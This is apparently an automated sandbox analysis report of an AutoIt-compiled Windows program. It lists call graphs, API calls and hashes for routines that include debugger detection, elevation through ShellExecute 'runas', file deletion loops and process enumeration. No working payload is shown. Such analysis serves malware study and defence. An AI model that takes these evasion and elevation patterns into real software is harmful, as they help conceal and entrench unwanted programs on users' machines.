99418->99371 99419 f19d62 99419->99415 99420 f19d68 99419->99420 99503 f19c63 58 API calls 4 library calls 99420->99503 99422 f19d70 GetCurrentThreadId 99422->99371 99424 f1d80e __wsopen_helper 99423->99424 99425 f19e3b __lock 58 API calls 99424->99425 99426 f1d815 99425->99426 99427 f18a05 __calloc_crt 58 API calls 99426->99427 99429 f1d826 99427->99429 99428 f1d891 GetStartupInfoW 99436 f1d9d5 99428->99436 99438 f1d8a6 99428->99438 99429->99428 99430 f1d831 __wsopen_helper @_EH4_CallFilterFunc@8 99429->99430 99430->99375 99431 f1da9d 99518 f1daad LeaveCriticalSection _doexit 99431->99518 99433 f1d8f4 99433->99436 99439 f1d928 GetFileType 99433->99439 99516 f1a05b InitializeCriticalSectionAndSpinCount 99433->99516 99434 f18a05 __calloc_crt 58 API calls 99434->99438 99435 f1da22 GetStdHandle 99435->99436 99436->99431 99436->99435 99437 f1da35 GetFileType 99436->99437 99517 f1a05b InitializeCriticalSectionAndSpinCount 99436->99517 99437->99436 99438->99433 99438->99434 99438->99436 99439->99433 99443 f25164 99442->99443 99444 f17f33 99442->99444 99519 f18a4d 58 API calls 2 library calls 99443->99519 99448 f24d4b GetModuleFileNameW 99444->99448 99446 f251a0 FreeEnvironmentStringsW 99446->99444 99447 f2518a _memmove 99447->99446 99449 f24d7f _wparse_cmdline 99448->99449 99451 f24dbf _wparse_cmdline 99449->99451 99520 f18a4d 58 API calls 2 library calls 99449->99520 99451->99382 99453 f24fa1 __wsetenvp 99452->99453 99457 f24f99 99452->99457 99454 f18a05 __calloc_crt 58 API calls 99453->99454 99462 f24fca __wsetenvp 99454->99462 99455 f25021 99456 f12f85 _free 58 API calls 99455->99456 99456->99457 99457->99386 99458 f18a05 __calloc_crt 58 API calls 99458->99462 99459 f25046 99461 f12f85 _free 58 API calls 99459->99461 99461->99457 99462->99455 99462->99457 99462->99458 99462->99459 99463 f2505d 99462->99463 99521 f24837 58 API calls 2 library calls 99462->99521 99522 f18ff6 IsProcessorFeaturePresent 99463->99522 99465 f25069 99465->99386 99467 f1332b 
__IsNonwritableInCurrentImage 99466->99467 99545 f1a701 99467->99545 99469 f13349 __initterm_e 99470 f12f70 __cinit 67 API calls 99469->99470 99471 f13368 __cinit __IsNonwritableInCurrentImage 99469->99471 99470->99471 99471->99390 99473 f05fa5 99472->99473 99483 f06044 99472->99483 99474 f05fdf IsThemeActive 99473->99474 99548 f1359c 99474->99548 99478 f0600b 99560 f05f00 SystemParametersInfoW SystemParametersInfoW 99478->99560 99480 f06017 99561 f05240 99480->99561 99482 f0601f SystemParametersInfoW 99482->99483 99483->99394 99484->99368 99485->99372 99486->99379 99490->99395 99491->99398 99492->99404 99493->99406 99494->99410 99495->99411 99498 f18a0c 99496->99498 99499 f18a47 99498->99499 99501 f18a2a 99498->99501 99505 f25426 99498->99505 99499->99415 99502 f1a016 TlsSetValue 99499->99502 99501->99498 99501->99499 99513 f1a362 Sleep 99501->99513 99502->99419 99503->99422 99504->99418 99506 f25431 99505->99506 99511 f2544c 99505->99511 99507 f2543d 99506->99507 99506->99511 99514 f18d58 58 API calls __getptd_noexit 99507->99514 99509 f2545c HeapAlloc 99510 f25442 99509->99510 99509->99511 99510->99498 99511->99509 99511->99510 99515 f135d1 DecodePointer 99511->99515 99513->99501 99514->99510 99515->99511 99516->99433 99517->99436 99518->99430 99519->99447 99520->99451 99521->99462 99523 f19001 99522->99523 99528 f18e89 99523->99528 99527 f1901c 99527->99465 99529 f18ea3 _memset ___raise_securityfailure 99528->99529 99530 f18ec3 IsDebuggerPresent 99529->99530 99536 f1a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99530->99536 99533 f18f87 ___raise_securityfailure 99537 f1c826 99533->99537 99534 f18faa 99535 f1a370 GetCurrentProcess TerminateProcess 99534->99535 99535->99527 99536->99533 99538 f1c830 IsProcessorFeaturePresent 99537->99538 99539 f1c82e 99537->99539 99541 f25b3a 99538->99541 99539->99534 99544 f25ae9 5 API calls ___raise_securityfailure 99541->99544 99543 f25c1d 99543->99534 99544->99543 99546 f1a704 EncodePointer 99545->99546 
99546->99546 99547 f1a71e 99546->99547 99547->99469 99549 f19e3b __lock 58 API calls 99548->99549 99550 f135a7 DecodePointer EncodePointer 99549->99550 99613 f19fa5 LeaveCriticalSection 99550->99613 99552 f06004 99553 f13604 99552->99553 99554 f13628 99553->99554 99555 f1360e 99553->99555 99554->99478 99555->99554 99614 f18d58 58 API calls __getptd_noexit 99555->99614 99557 f13618 99615 f18fe6 9 API calls __wsopen_helper 99557->99615 99559 f13623 99559->99478 99560->99480 99562 f0524d __ftell_nolock 99561->99562 99563 f01207 59 API calls 99562->99563 99564 f05258 GetCurrentDirectoryW 99563->99564 99616 f04ec8 99564->99616 99566 f0527e IsDebuggerPresent 99567 f40b21 MessageBoxA 99566->99567 99568 f0528c 99566->99568 99570 f40b39 99567->99570 99569 f052a0 99568->99569 99568->99570 99684 f031bf 99569->99684 99739 f0314d 59 API calls Mailbox 99570->99739 99573 f40b49 99580 f40b5f SetCurrentDirectoryW 99573->99580 99579 f0536c Mailbox 99579->99482 99580->99579 99613->99552 99614->99557 99615->99559 99617 f01207 59 API calls 99616->99617 99618 f04ede 99617->99618 99748 f05420 99618->99748 99620 f04efc 99621 f019e1 59 API calls 99620->99621 99622 f04f10 99621->99622 99623 f01c9c 59 API calls 99622->99623 99624 f04f1b 99623->99624 99762 ef477a 99624->99762 99627 f01a36 59 API calls 99628 f04f34 99627->99628 99629 ef39be 68 API calls 99628->99629 99630 f04f44 Mailbox 99629->99630 99631 f01a36 59 API calls 99630->99631 99632 f04f68 99631->99632 99633 ef39be 68 API calls 99632->99633 99634 f04f77 Mailbox 99633->99634 99635 f01207 59 API calls 99634->99635 99636 f04f94 99635->99636 99765 f055bc 99636->99765 99640 f04fae 99641 f40a54 99640->99641 99642 f04fb8 99640->99642 99643 f055bc 59 API calls 99641->99643 99644 f1312d _W_store_winword 60 API calls 99642->99644 99645 f40a68 99643->99645 99646 f04fc3 99644->99646 99649 f055bc 59 API calls 99645->99649 99646->99645 99647 f04fcd 99646->99647 99648 f1312d _W_store_winword 60 API calls 99647->99648 99650 f04fd8 99648->99650 
99651 f40a84 99649->99651 99650->99651 99652 f04fe2 99650->99652 99653 f100cf 61 API calls 99651->99653 99654 f1312d _W_store_winword 60 API calls 99652->99654 99655 f40aa7 99653->99655 99656 f04fed 99654->99656 99657 f055bc 59 API calls 99655->99657 99658 f04ff7 99656->99658 99659 f40ad0 99656->99659 99660 f40ab3 99657->99660 99661 f0501b 99658->99661 99664 f01c9c 59 API calls 99658->99664 99662 f055bc 59 API calls 99659->99662 99663 f01c9c 59 API calls 99660->99663 99668 ef47be 59 API calls 99661->99668 99665 f40aee 99662->99665 99666 f40ac1 99663->99666 99667 f0500e 99664->99667 99669 f01c9c 59 API calls 99665->99669 99670 f055bc 59 API calls 99666->99670 99671 f055bc 59 API calls 99667->99671 99672 f0502a 99668->99672 99673 f40afc 99669->99673 99670->99659 99671->99661 99675 ef4540 59 API calls 99672->99675 99674 f055bc 59 API calls 99673->99674 99676 f40b0b 99674->99676 99677 f05038 99675->99677 99676->99676 99781 ef43d0 99677->99781 99679 ef477a 59 API calls 99681 f05055 99679->99681 99680 ef43d0 59 API calls 99680->99681 99681->99679 99681->99680 99682 f055bc 59 API calls 99681->99682 99683 f0509b Mailbox 99681->99683 99682->99681 99683->99566 99685 f031cc __ftell_nolock 99684->99685 99686 f40314 _memset 99685->99686 99687 f031e5 99685->99687 99689 f40330 GetOpenFileNameW 99686->99689 99688 f10284 60 API calls 99687->99688 99690 f031ee 99688->99690 99692 f4037f 99689->99692 99801 f109c5 99690->99801 99694 f01821 59 API calls 99692->99694 99696 f40394 99694->99696 99696->99696 99697 f03203 99819 f0278a 99697->99819 99739->99573 99749 f0542d __ftell_nolock 99748->99749 99750 f01821 59 API calls 99749->99750 99752 f05590 Mailbox 99749->99752 99753 f0545f 99750->99753 99751 f01609 59 API calls 99751->99753 99752->99620 99753->99751 99761 f05495 Mailbox 99753->99761 99754 f01609 59 API calls 99754->99761 99755 f05563 99755->99752 99756 f01a36 59 API calls 99755->99756 99757 f05584 99756->99757 99759 f04c94 59 API calls 99757->99759 99758 f01a36 59 API calls 
99758->99761 99759->99752 99761->99752 99761->99754 99761->99755 99761->99758 99790 f04c94 99761->99790 99763 f10fe6 Mailbox 59 API calls 99762->99763 99764 ef4787 99763->99764 99764->99627 99766 f055c6 99765->99766 99767 f055df 99765->99767 99768 f01c9c 59 API calls 99766->99768 99769 f01821 59 API calls 99767->99769 99770 f04fa0 99768->99770 99769->99770 99771 f1312d 99770->99771 99772 f131ae 99771->99772 99774 f13139 99771->99774 99798 f131c0 60 API calls 4 library calls 99772->99798 99780 f1315e 99774->99780 99796 f18d58 58 API calls __getptd_noexit 99774->99796 99776 f131bb 99776->99640 99777 f13145 99797 f18fe6 9 API calls __wsopen_helper 99777->99797 99779 f13150 99779->99640 99780->99640 99782 f2d6c9 99781->99782 99784 ef43e7 99781->99784 99782->99784 99800 ef40cb 59 API calls Mailbox 99782->99800 99785 ef44e8 99784->99785 99786 ef4530 99784->99786 99789 ef44ef 99784->99789 99788 f10fe6 Mailbox 59 API calls 99785->99788 99799 ef523c 59 API calls 99786->99799 99788->99789 99789->99681 99791 f04ca2 99790->99791 99795 f04cc4 _memmove 99790->99795 99794 f10fe6 Mailbox 59 API calls 99791->99794 99792 f10fe6 Mailbox 59 API calls 99793 f04cd8 99792->99793 99793->99761 99794->99795 99795->99792 99796->99777 99797->99779 99798->99776 99799->99789 99800->99784 99802 f21b70 __ftell_nolock 99801->99802 99803 f109d2 GetLongPathNameW 99802->99803 99804 f01821 59 API calls 99803->99804 99805 f031f7 99804->99805 99806 f02f3d 99805->99806 99807 f01207 59 API calls 99806->99807 99808 f02f4f 99807->99808 99809 f10284 60 API calls 99808->99809 99810 f02f5a 99809->99810 99811 f02f65 99810->99811 99816 f40177 99810->99816 99813 f04c94 59 API calls 99811->99813 99812 f0151f 61 API calls 99812->99816 99814 f02f71 99813->99814 99853 ef1307 99814->99853 99815 f40191 99816->99812 99816->99815 99818 f02f84 Mailbox 99818->99697 99859 f049c2 99819->99859 99822 f3f8d6 99976 f59b16 99822->99976 99823 f049c2 136 API calls 99825 f027c3 99823->99825 99825->99822 99827 f027cb 99825->99827 
99831 f3f8f3 99827->99831 99832 f027d7 99827->99832 99855 ef1319 99853->99855 99858 ef1338 _memmove 99853->99858 99854 f10fe6 Mailbox 59 API calls 99856 ef134f 99854->99856 99857 f10fe6 Mailbox 59 API calls 99855->99857 99856->99818 99857->99858 99858->99854 100043 f04b29 99859->100043 99864 f049ed LoadLibraryExW 100053 f04ade 99864->100053 99865 f408bb 99866 f04a2f 84 API calls 99865->99866 99868 f408c2 99866->99868 99871 f04ade 3 API calls 99868->99871 99873 f408ca 99871->99873 99872 f04a14 99872->99873 99874 f04a20 99872->99874 100079 f04ab2 99873->100079 99875 f04a2f 84 API calls 99874->99875 99877 f027af 99875->99877 99877->99822 99877->99823 99880 f408f1 100087 f04a6e 99880->100087 99977 f04a8c 85 API calls 99976->99977 99978 f59b85 99977->99978 100092 f04b77 100043->100092 100046 f04b50 100048 f04b60 FreeLibrary 100046->100048 100049 f049d4 100046->100049 100047 f04b77 2 API calls 100047->100046 100048->100049 100050 f1547b 100049->100050 100096 f15490 100050->100096 100052 f049e1 100052->99864 100052->99865 100177 f04baa 100053->100177 100056 f04baa 2 API calls 100059 f04b03 100056->100059 100057 f04b15 FreeLibrary 100058 f04a05 100057->100058 100060 f048b0 100058->100060 100059->100057 100059->100058 100061 f10fe6 Mailbox 59 API calls 100060->100061 100062 f048c5 100061->100062 100063 f0433f 59 API calls 100062->100063 100064 f048d1 _memmove 100063->100064 100065 f0490c 100064->100065 100066 f4080a 100064->100066 100068 f04a6e 69 API calls 100065->100068 100067 f40817 100066->100067 100186 f59ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100066->100186 100187 f59f5e 95 API calls 100067->100187 100078 f04915 100068->100078 100071 f04ab2 74 API calls 100071->100078 100072 f40859 100181 f04a8c 100072->100181 100075 f049a0 100075->99872 100076 f04a8c 85 API calls 100076->100078 100078->100071 100078->100072 100078->100075 100078->100076 100080 f40945 100079->100080 100081 f04ac4 100079->100081 100293 f15802 100081->100293 
100084 f596c4 100418 f5951a 100084->100418 100086 f596da 100086->99880 100088 f40908 100087->100088 100089 f04a7d 100087->100089 100423 f15e80 100089->100423 100093 f04b44 100092->100093 100094 f04b80 LoadLibraryA 100092->100094 100093->100046 100093->100047 100094->100093 100095 f04b91 GetProcAddress 100094->100095 100095->100093 100097 f1549c __wsopen_helper 100096->100097 100098 f154af 100097->100098 100101 f154e0 100097->100101 100145 f18d58 58 API calls __getptd_noexit 100098->100145 100100 f154b4 100146 f18fe6 9 API calls __wsopen_helper 100100->100146 100115 f20718 100101->100115 100104 f154e5 100105 f154fb 100104->100105 100106 f154ee 100104->100106 100108 f15525 100105->100108 100109 f15505 100105->100109 100147 f18d58 58 API calls __getptd_noexit 100106->100147 100130 f20837 100108->100130 100148 f18d58 58 API calls __getptd_noexit 100109->100148 100111 f154bf __wsopen_helper @_EH4_CallFilterFunc@8 100111->100052 100116 f20724 __wsopen_helper 100115->100116 100117 f19e3b __lock 58 API calls 100116->100117 100126 f20732 100117->100126 100118 f207ad 100155 f18a4d 58 API calls 2 library calls 100118->100155 100121 f20823 __wsopen_helper 100121->100104 100122 f207b4 100128 f207a6 100122->100128 100156 f1a05b InitializeCriticalSectionAndSpinCount 100122->100156 100123 f19ec3 __mtinitlocknum 58 API calls 100123->100126 100126->100118 100126->100123 100126->100128 100153 f16e7d 59 API calls __lock 100126->100153 100154 f16ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100126->100154 100127 f207da EnterCriticalSection 100127->100128 100150 f2082e 100128->100150 100131 f20857 __wopenfile 100130->100131 100132 f20871 100131->100132 100144 f20a2c 100131->100144 100163 f139fb 60 API calls 3 library calls 100131->100163 100161 f18d58 58 API calls __getptd_noexit 100132->100161 100134 f20876 100162 f18fe6 9 API calls __wsopen_helper 100134->100162 100136 f15530 100149 f15552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100136->100149 100137 f20a8f 100158 
f287d1 100137->100158 100140 f20a25 100140->100144 100164 f139fb 60 API calls 3 library calls 100140->100164 100142 f20a44 100142->100144 100165 f139fb 60 API calls 3 library calls 100142->100165 100144->100132 100144->100137 100145->100100 100146->100111 100147->100111 100148->100111 100149->100111 100157 f19fa5 LeaveCriticalSection 100150->100157 100152 f20835 100152->100121 100153->100126 100154->100126 100155->100122 100156->100127 100157->100152 100166 f27fb5 100158->100166 100160 f287ea 100160->100136 100161->100134 100162->100136 100163->100140 100164->100142 100165->100144 100169 f27fc1 __wsopen_helper 100166->100169 100167 f27fd7 100168 f18d58 __flsbuf 58 API calls 100167->100168 100170 f27fdc 100168->100170 100169->100167 100171 f2800d 100169->100171 100172 f18fe6 __wsopen_helper 9 API calls 100170->100172 100173 f2807e __wsopen_nolock 109 API calls 100171->100173 100176 f27fe6 __wsopen_helper 100172->100176 100174 f28029 100173->100174 100175 f28052 __wsopen_helper LeaveCriticalSection 100174->100175 100175->100176 100176->100160 100178 f04af7 100177->100178 100179 f04bb3 LoadLibraryA 100177->100179 100178->100056 100178->100059 100179->100178 100180 f04bc4 GetProcAddress 100179->100180 100180->100178 100182 f40923 100181->100182 100183 f04a9b 100181->100183 100188 f15a6d 100183->100188 100186->100067 100187->100078 100189 f15a79 __wsopen_helper 100188->100189 100190 f15a8b 100189->100190 100192 f15ab1 100189->100192 100219 f18d58 58 API calls __getptd_noexit 100190->100219 100201 f16e3e 100192->100201 100194 f15a90 100220 f18fe6 9 API calls __wsopen_helper 100194->100220 100202 f16e70 EnterCriticalSection 100201->100202 100203 f16e4e 100201->100203 100205 f15ab7 100202->100205 100203->100202 100204 f16e56 100203->100204 100219->100194 100296 f1581d 100293->100296 100295 f04ad5 100295->100084 100297 f15829 __wsopen_helper 100296->100297 100298 f1586c 100297->100298 100299 f1583f _memset 100297->100299 100300 f15864 __wsopen_helper 100297->100300 100301 
f16e3e __lock_file 59 API calls 100298->100301 100323 f18d58 58 API calls __getptd_noexit 100299->100323 100300->100295 100302 f15872 100301->100302 100309 f1563d 100302->100309 100305 f15859 100324 f18fe6 9 API calls __wsopen_helper 100305->100324 100313 f15658 _memset 100309->100313 100315 f15673 100309->100315 100310 f15663 100414 f18d58 58 API calls __getptd_noexit 100310->100414 100312 f15668 100415 f18fe6 9 API calls __wsopen_helper 100312->100415 100313->100310 100313->100315 100318 f156b3 100313->100318 100325 f158a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100315->100325 100317 f157c4 _memset 100417 f18d58 58 API calls __getptd_noexit 100317->100417 100318->100315 100318->100317 100319 f14906 __flsbuf 58 API calls 100318->100319 100326 f2108b 100318->100326 100394 f20dd7 100318->100394 100416 f20ef8 58 API calls 4 library calls 100318->100416 100319->100318 100323->100305 100324->100300 100325->100300 100327 f210c3 100326->100327 100328 f210ac 100326->100328 100330 f217fb 100327->100330 100334 f210fd 100327->100334 100329 f18d24 __write 58 API calls 100328->100329 100331 f210b1 100329->100331 100332 f18d24 __write 58 API calls 100330->100332 100333 f18d58 __flsbuf 58 API calls 100331->100333 100335 f21800 100332->100335 100374 f210b8 100333->100374 100337 f21105 100334->100337 100343 f2111c 100334->100343 100336 f18d58 __flsbuf 58 API calls 100335->100336 100338 f21111 100336->100338 100339 f18d24 __write 58 API calls 100337->100339 100340 f2110a 100339->100340 100346 f18d58 __flsbuf 58 API calls 100340->100346 100342 f21131 100344 f18d24 __write 58 API calls 100342->100344 100343->100342 100345 f2114b 100343->100345 100347 f21169 100343->100347 100343->100374 100344->100340 100345->100342 100351 f21156 100345->100351 100346->100338 100348 f18a4d __malloc_crt 58 API calls 100347->100348 100349 f21179 100348->100349 100350 f25e9b __flsbuf 58 API calls 100351->100350 100374->100318 100395 f20de2 100394->100395 100398 f20df7 100394->100398 100396 

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F0526C
                                                    • IsDebuggerPresent.KERNEL32 ref: 00F0527E
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00F052E6
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                      • Part of subcall function 00EFBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EFBC07
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F05366
                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00F40B2E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F40B66
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FA6D10), ref: 00F40BE9
                                                    • ShellExecuteW.SHELL32(00000000), ref: 00F40BF0
                                                      • Part of subcall function 00F0514C: GetSysColorBrush.USER32(0000000F), ref: 00F05156
                                                      • Part of subcall function 00F0514C: LoadCursorW.USER32(00000000,00007F00), ref: 00F05165
                                                      • Part of subcall function 00F0514C: LoadIconW.USER32(00000063), ref: 00F0517C
                                                      • Part of subcall function 00F0514C: LoadIconW.USER32(000000A4), ref: 00F0518E
                                                      • Part of subcall function 00F0514C: LoadIconW.USER32(000000A2), ref: 00F051A0
                                                      • Part of subcall function 00F0514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F051C6
                                                      • Part of subcall function 00F0514C: RegisterClassExW.USER32(?), ref: 00F0521C
                                                      • Part of subcall function 00F050DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F05109
                                                      • Part of subcall function 00F050DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F0512A
                                                      • Part of subcall function 00F050DB: ShowWindow.USER32(00000000), ref: 00F0513E
                                                      • Part of subcall function 00F050DB: ShowWindow.USER32(00000000), ref: 00F05147
                                                      • Part of subcall function 00F059D3: _memset.LIBCMT ref: 00F059F9
                                                      • Part of subcall function 00F059D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F05A9E
                                                    Strings
                                                    • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00F40B28
                                                    • AutoIt, xrefs: 00F40B23
                                                    • runas, xrefs: 00F40BE4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                    • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                    • API String ID: 529118366-2030392706
                                                    • Opcode ID: f711ca80c4859250fda0a170db6c0e9686af9d6c8538d62a5a634baa53e01094
                                                    • Instruction ID: 7dc961c0f60914b55a22a35db7a98e2ac9d85da5c93450bc21332fa52db310cc
                                                    • Opcode Fuzzy Hash: f711ca80c4859250fda0a170db6c0e9686af9d6c8538d62a5a634baa53e01094
                                                    • Instruction Fuzzy Hash: 8C51C131D0834CAADF11BBB0DC45EFE7B79AF85740B104169F951A21A2CAB85949FF21

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00F10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F02A58,?,00008000), ref: 00F102A4
                                                      • Part of subcall function 00F54FEC: GetFileAttributesW.KERNEL32(?,00F53BFE), ref: 00F54FED
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F53D96
                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F53E3E
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F53E51
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F53E6E
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F53E90
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F53EAC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: 897d726a79b3f9e0a2fd429368bca54da52046d1772afe5b5f17d5a9eadceba0
                                                    • Instruction ID: 839b36dad2f24b7d1dc7ab73a216ca79b81d2f574a79c108d8159fe6307f5fe5
                                                    • Opcode Fuzzy Hash: 897d726a79b3f9e0a2fd429368bca54da52046d1772afe5b5f17d5a9eadceba0
                                                    • Instruction Fuzzy Hash: 68516D3180115DABCF16EBA4CD929EDB7B9AF10351F604165E942A3092EF396F0DFB60

Control-flow Graph: function at 00F05D13 (basic blocks 00F05D13-00F05EA2 and 00F40FA9-00F410C8; the edge listing and the executed/not-executed colouring are not reproduced in text)
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00F05D40
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • GetCurrentProcess.KERNEL32(?,00F80A18,00000000,00000000,?), ref: 00F05E07
                                                    • IsWow64Process.KERNEL32(00000000), ref: 00F05E0E
                                                    • GetNativeSystemInfo.KERNEL32(00000000), ref: 00F05E54
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F05E5F
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00F05E90
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00F05E9C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                    • String ID:
                                                    • API String ID: 1986165174-0
                                                    • Opcode ID: 7d4d0d0d228a1b10322de9b0fab181ddd5e1e19c85f1446192ddaef5e5360534
                                                    • Instruction ID: 346d9fde6171b67085f0a13bc28e78979f45b8335581f5cb965000eaca26b4a1
                                                    • Opcode Fuzzy Hash: 7d4d0d0d228a1b10322de9b0fab181ddd5e1e19c85f1446192ddaef5e5360534
                                                    • Instruction Fuzzy Hash: DC91E631949BC4DEC731CB78C4541ABBFE5AF25310B880A5ED0C783A81D674A58CFB59

Control-flow Graph: function at 00F54005 (basic blocks 00F54005-00F54129; the edge listing and the executed/not-executed colouring are not reproduced in text)
                                                    APIs
                                                      • Part of subcall function 00F10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F02A58,?,00008000), ref: 00F102A4
                                                      • Part of subcall function 00F54FEC: GetFileAttributesW.KERNEL32(?,00F53BFE), ref: 00F54FED
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F5407C
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F540CC
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F540DD
                                                    • FindClose.KERNEL32(00000000), ref: 00F540F4
                                                    • FindClose.KERNEL32(00000000), ref: 00F540FD
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 2649000838-1173974218
                                                    • Opcode ID: 0ee53e6701dedbc2cd77d5273c90aa15d7b7a18bd147ca3930fbe76f901fda9b
                                                    • Instruction ID: bf23dae95f5f26d657b27ce397d6219fb263ca4a0c8b233cdde291bc087fc5d8
                                                    • Opcode Fuzzy Hash: 0ee53e6701dedbc2cd77d5273c90aa15d7b7a18bd147ca3930fbe76f901fda9b
                                                    • Instruction Fuzzy Hash: 96317E31008385ABC301EB60CC959EFB7E8BE95315F444A1DF9E5821D2DB64EA4DF7A2
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F5416D
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F5417B
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F5419B
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F54245
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
